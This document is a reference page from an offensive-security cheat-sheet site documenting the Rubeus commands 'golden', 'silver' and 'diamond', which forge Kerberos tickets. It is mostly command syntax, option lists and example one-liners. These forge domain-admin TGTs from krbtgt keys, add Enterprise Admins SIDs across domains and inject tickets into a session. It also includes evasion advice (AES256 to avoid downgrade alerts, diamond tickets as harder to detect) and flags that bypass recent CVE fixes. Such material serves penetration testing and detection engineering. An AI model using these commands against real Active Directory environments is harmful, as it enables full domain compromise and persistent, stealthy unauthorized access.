🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🎟️ Rubeus / golden / silver / diamond

golden / silver / diamond

Forge Kerberos tickets. golden forges TGTs, silver forges service tickets (TGS), diamond modifies a real TGT to change PAC fields.

golden β€” Forge TGT

# Auto-populate from LDAP
Rubeus.exe golden </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> /ldap [/dc:<dc-ip>] [/domain:<domain>] [/sid:<sid>] [/groups:<group-ids>] [/sids:<extra-sids>] [/id:<user-id>] [/ptt] [/outfile:<output>] [/printcmd] [/nowrap]

# Fully explicit
Rubeus.exe golden </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> </domain:<domain>> </sid:<sid>> [/dc:<dc-ip>] [/netbios:<netbios>] [/groups:<group-ids>] [/pgid:<pgid>] [/id:<user-id>] [/sids:<extra-sids>] [/starttime:<ts>] [/endtime:<relative>] [/renewtill:<relative>] [/oldpac] [/extendedupndns] [/ptt] [/outfile:<output>] [/printcmd]

golden Options

  • /rc4:<rc4> β€” krbtgt NT hash
  • /aes256:<aes256-key> β€” krbtgt AES256 key (preferred, less detectable)
  • /aes128:<aes128-key> β€” krbtgt AES128 key
  • /user:<username> β€” username to impersonate
  • /domain:<domain> β€” FQDN of domain
  • /sid:<sid> β€” domain SID (e.g. S-1-5-21-...)
  • /ldap β€” auto-query LDAP for PAC fields (user info, groups, policy)
  • /dc:<dc-ip> β€” DC for LDAP queries
  • /id:<user-id> β€” user RID (default: 500)
  • /pgid:<pgid> β€” primary group ID (default: 513)
  • /groups:<group-ids> β€” comma-separated group RIDs (default: 520,512,513,519,518)
  • /sids:<extra-sids> β€” ExtraSIDs, e.g. Enterprise Admins SID for cross-domain
  • /netbios:<netbios> β€” NetBIOS domain name
  • /displayname:<name> β€” full display name in PAC
  • /starttime:<ts> β€” ticket start time (local time)
  • /endtime:<relative> β€” relative end time, e.g. 10h, 7d
  • /renewtill:<relative> β€” renewal limit, e.g. 7d
  • /oldpac β€” exclude new PAC buffers added post-CVE-2021-42287
  • /extendedupndns β€” include extended UpnDns fields
  • /rodcNumber:<n> β€” forge RODC partial TGT for Key List Requests
  • /ptt β€” inject into current session
  • /outfile:<output> β€” save to file
  • /printcmd β€” print command to re-forge the same ticket

silver β€” Forge Service Ticket (TGS)

# Auto-populate from LDAP
Rubeus.exe silver </des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> </user:<username>> </service:<spn>> /ldap [/krbkey:<hash>] [/krbenctype:DES|RC4|AES128|AES256] [/creduser:<domain>\<username>] [/credpassword:<password>] [/dc:<dc-ip>] [/domain:<domain>] [/sid:<sid>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt] [/outfile:<output>] [/nofullpacsig] [/printcmd]

# Explicit
Rubeus.exe silver </rc4:<rc4> | /aes256:<aes256-key>> </user:<username>> </service:<spn>> </domain:<domain>> </sid:<sid>> [/krbkey:<hash>] [/dc:<dc-ip>] [/netbios:<netbios>] [/groups:<group-ids>] [/sids:<extra-sids>] [/authdata] [/cname:<name>] [/crealm:<domain>] [/s4uproxytarget:<spn>] [/s4utransitedservices:<spn1>,<spn2>] [/nofullpacsig] [/ptt] [/outfile:<output>]

silver Options

  • /service:<spn> β€” target SPN (e.g. cifs/<computer>.<domain>)
  • /krbkey:<hash> β€” krbtgt key for signing KDCChecksum and TicketChecksum
  • /krbenctype:<type> β€” encryption type for krbkey
  • /nofullpacsig β€” exclude FullPacChecksum (pre-CVE-2022-37967 behavior)
  • /authdata β€” add KERB-LOCAL and KERB-AD-RESTRICTION-ENTRY authorization data
  • /cname:<name> / /crealm:<domain> β€” override client name/realm in EncTicketPart
  • /s4uproxytarget:<spn> β€” add S4UDelegationInfo PAC section
  • /s4utransitedservices:<spn1,...> β€” list of delegation SPNs
  • /creduser:<domain>\<username> β€” alternate LDAP credentials
  • /credpassword:<password> β€” password for alternate LDAP credentials

diamond β€” Forge Diamond TGT

Request a real TGT then modify PAC fields by decrypting and re-encrypting with the krbtgt key.

# From password
Rubeus.exe diamond /krbkey:<hash> /user:<username> /password:<password> [/enctype:aes] [/domain:<domain>] [/dc:<dc-ip>] [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt] [/outfile:<output>] [/luid]

# From tgtdeleg trick (no creds needed)
Rubeus.exe diamond /krbkey:<hash> /tgtdeleg [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt]

# From PKINIT certificate
Rubeus.exe diamond /krbkey:<hash> /user:<username> /certificate:<path.pfx> [/password:<password>] [/domain:<domain>] [/dc:<dc-ip>] [/ticketuser:<username>] [/ticketuserid:<user-id>] [/groups:<group-ids>] [/sids:<extra-sids>] [/ptt]

diamond Options

  • /krbkey:<hash> β€” krbtgt AES256/RC4 key to decrypt and resign the TGT
  • /ticketuser:<username> β€” username to embed in the modified ticket
  • /ticketuserid:<user-id> β€” RID of the embedded user
  • /groups:<group-ids> β€” comma-separated group RIDs
  • /sids:<extra-sids> β€” ExtraSIDs (e.g. Enterprise Admins)
  • /tgtdeleg β€” use tgtdeleg trick to get base TGT

Common PAC Field Arguments (golden/silver/diamond)

Argument PAC Field
/id:<user-id> UserId
/pgid:<pgid> PrimaryGroupId
/groups:<group-ids> Groups
/sids:<extra-sids> ExtraSIDs
/sid:<sid> LogonDomainId
/netbios:<netbios> LogonDomainName
/displayname:<name> FullName
/logoncount:<n> LogonCount
/badpwdcount:<n> BadPasswordCount
/uac:<flags> UserAccountControl
/homedir:<dir> HomeDirectory
/profilepath:<path> ProfilePath
/scriptpath:<path> LogonScript
/passlastset:<ts> PasswordLastSet
/minpassage:<days> PasswordCanChange
/maxpassage:<days> PasswordMustChange

Relative time format: integer + m(minutes), h(hours), d(days), M(months), y(years)

Examples

# Golden ticket via LDAP (minimal args)
Rubeus.exe golden /aes256:<aes256-key> /ldap /user:<username> /printcmd /ptt

# Golden ticket explicit (cross-domain with Enterprise Admins SID)
Rubeus.exe golden /aes256:<aes256-key> /user:Administrator /domain:<domain> /sid:<sid> /sids:<sid>-519 /id:500 /groups:512,513,519 /ptt

# Silver ticket (cifs access)
Rubeus.exe silver /rc4:<rc4> /user:<username> /service:cifs/<computer>.<domain> /ldap /krbkey:<aes256-key> /krbenctype:aes256 /domain:<domain> /ptt

# Diamond ticket from tgtdeleg (no plaintext creds)
Rubeus.exe diamond /krbkey:<aes256-key> /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512

# Cross-domain referral TGT (inter-realm)
Rubeus.exe silver /user:<username> /ldap /service:krbtgt/<child-domain> /rc4:<rc4> /sids:<parent-sid>-519 /nowrap

Notes

  • Golden tickets are signed with krbtgt hash β€” use AES256 over RC4 for stealth (RC4 triggers encryption downgrade alerts)
  • Golden tickets survive password changes (krbtgt hash must be rotated twice)
  • Diamond tickets are based on real TGTs so PAC signatures are valid β€” harder to detect than pure golden tickets
  • /oldpac removes Requestor/Attributes buffers added to fix CVE-2021-42287 (needed for older environments)
  • /nofullpacsig removes FullPacChecksum added to fix CVE-2022-37967 (needed for older patch levels)